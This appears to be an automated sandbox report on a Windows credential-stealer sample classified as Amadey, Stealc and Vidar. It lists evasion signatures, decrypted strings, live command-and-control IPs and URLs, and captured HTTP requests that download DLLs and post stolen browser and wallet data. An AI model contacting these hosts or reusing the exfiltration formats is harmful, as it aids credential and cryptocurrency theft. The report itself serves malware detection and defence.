Windows Analysis Report
1jPL5zru3u.exe

Overview

General Information

Sample name: 1jPL5zru3u.exe (renamed because the original name is a hash value)
Original sample name: b3badd1cd2cba4f587bd6737d34d3569.exe
Analysis ID: 1464487
MD5: b3badd1cd2cba4f587bd6737d34d3569
SHA1: bc229f10399c3482df1faa98bf7074a4440e82a5
SHA256: 9c1c20db1d73c66795b9b49f39aff02d621dd06c05d7d3ea1007ac7bcbf3f3cd
Tags: 32, exe, trojan

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Potentially malicious time measurement code found
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that grabs information on 2FA software and the Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: 1jPL5zru3u.exe Avira: detected
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll9 Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.phpsJ0 Avira URL Cloud: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe-Disposition: Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exeData Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpi Avira URL Cloud: Label: malware
Source: http://85.28.47.4 Avira URL Cloud: Label: malware
Source: 85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: 1jPL5zru3u.exe.6980.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "85.28.47.4/920475a59bac849d.php"}
Source: explorti.exe.7292.10.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php"]}
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Joe Sandbox ML: detected
Source: 1jPL5zru3u.exe Joe Sandbox ML: detected
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetProcAddress
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: LoadLibraryA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: lstrcatA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: OpenEventA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: CreateEventA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: CloseHandle
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: Sleep
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: VirtualFree
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetSystemInfo
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: VirtualAlloc
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: HeapAlloc
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetComputerNameA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: lstrcpyA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetProcessHeap
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetCurrentProcess
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: lstrlenA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: ExitProcess
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetSystemTime
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: advapi32.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: gdi32.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: user32.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: crypt32.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: ntdll.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetUserNameA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: CreateDCA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetDeviceCaps
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: ReleaseDC
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: sscanf
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: VMwareVMware
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: HAL9TH
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: JohnDoe
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: DISPLAY
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: http://85.28.47.4
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: /920475a59bac849d.php
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: /69934896f997d5bb/
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: default
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetFileAttributesA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GlobalLock
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: HeapFree
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetFileSize
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GlobalSize
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: IsWow64Process
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: Process32Next
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetLocalTime
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: FreeLibrary
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetVolumeInformationA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: Process32First
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetLocaleInfoA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetModuleFileNameA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: DeleteFileA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: FindNextFileA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: LocalFree
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: FindClose
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: LocalAlloc
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetFileSizeEx
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: ReadFile
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: SetFilePointer
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: WriteFile
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: CreateFileA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: FindFirstFileA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: CopyFileA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: VirtualProtect
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetLastError
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: lstrcpynA
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: MultiByteToWideChar
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GlobalFree
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: WideCharToMultiByte
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GlobalAlloc
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: OpenProcess
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: TerminateProcess
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: GetCurrentProcessId
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: gdiplus.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: ole32.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: bcrypt.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: wininet.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: shlwapi.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: shell32.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: psapi.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: rstrtmgr.dll
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: SelectObject
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: BitBlt
Source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack String decryptor: DeleteObject
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C3D6C80
Source: 1jPL5zru3u.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: 1jPL5zru3u.exe, 00000000.00000002.1889326037.000000006C43D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: 1jPL5zru3u.exe, 00000000.00000002.1889617051.000000006C5FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: 1jPL5zru3u.exe, 00000000.00000002.1889617051.000000006C5FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: 1jPL5zru3u.exe, 00000000.00000002.1889326037.000000006C43D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49731 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49731 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.4:80 -> 192.168.2.4:49731
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49731 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.4:80 -> 192.168.2.4:49731
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49743 -> 77.91.77.82:80
Source: Malware configuration extractor URLs: 85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor IPs: 77.91.77.82
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Fri, 28 Jun 2024 20:31:57 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT ETag: "10e436-5e7eeebed8d80" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Fri, 28 Jun 2024 20:32:03 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "a7550-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Fri, 28 Jun 2024 20:32:04 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "94750-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jun 2024 20:32:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jun 2024 20:32:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jun 2024 20:32:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jun 2024 20:32:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 28 Jun 2024 20:32:12 GMTContent-Type: application/octet-streamContent-Length: 1899520Last-Modified: Fri, 28 Jun 2024 19:26:33 GMTConnection: keep-aliveETag: "667f0e69-1cfc00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIIDAEBGCAAECAKFHIIHost: 85.28.47.4Content-Length: 214Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------BGIIDAEBGCAAECAKFHIIContent-Disposition: form-data; name="hwid"9799989EB3793994880753------BGIIDAEBGCAAECAKFHIIContent-Disposition: form-data; name="build"default------BGIIDAEBGCAAECAKFHII--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKJKJJJECFIEBFHIEGHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="token"47ca1f575b916e0e6f08570c371e6058cafb70d216dc32ed9ee645b7a22be166209554f5------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="message"browsers------CBAKJKJJJECFIEBFHIEG--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGHDGIDAKEBAAKFCGHCHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------IDGHDGIDAKEBAAKFCGHCContent-Disposition: form-data; name="token"47ca1f575b916e0e6f08570c371e6058cafb70d216dc32ed9ee645b7a22be166209554f5------IDGHDGIDAKEBAAKFCGHCContent-Disposition: form-data; name="message"plugins------IDGHDGIDAKEBAAKFCGHC--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDGHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="token"47ca1f575b916e0e6f08570c371e6058cafb70d216dc32ed9ee645b7a22be166209554f5------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="message"fplugins------HDBGDHDAECBGDHJKFIDG--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBAHost: 85.28.47.4Content-Length: 6983Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFCHost: 85.28.47.4Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECFIEGDBKJKFIDHIECGHost: 85.28.47.4Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFIHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="token"47ca1f575b916e0e6f08570c371e6058cafb70d216dc32ed9ee645b7a22be166209554f5------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="file"------DGDBKFBAKFBFHIECFBFI--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEHHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------IIJDBAKKKFBFHIDGIIEHContent-Disposition: form-data; name="token"47ca1f575b916e0e6f08570c371e6058cafb70d216dc32ed9ee645b7a22be166209554f5------IIJDBAKKKFBFHIDGIIEHContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------IIJDBAKKKFBFHIDGIIEHContent-Disposition: form-data; name="file"------IIJDBAKKKFBFHIDGIIEH--
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFBFCBGHDGCFHJJECAFHost: 85.28.47.4Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDHHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="token"47ca1f575b916e0e6f08570c371e6058cafb70d216dc32ed9ee645b7a22be166209554f5------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="message"wallets------DBKFHCFBGIIJKFHJDHDH--
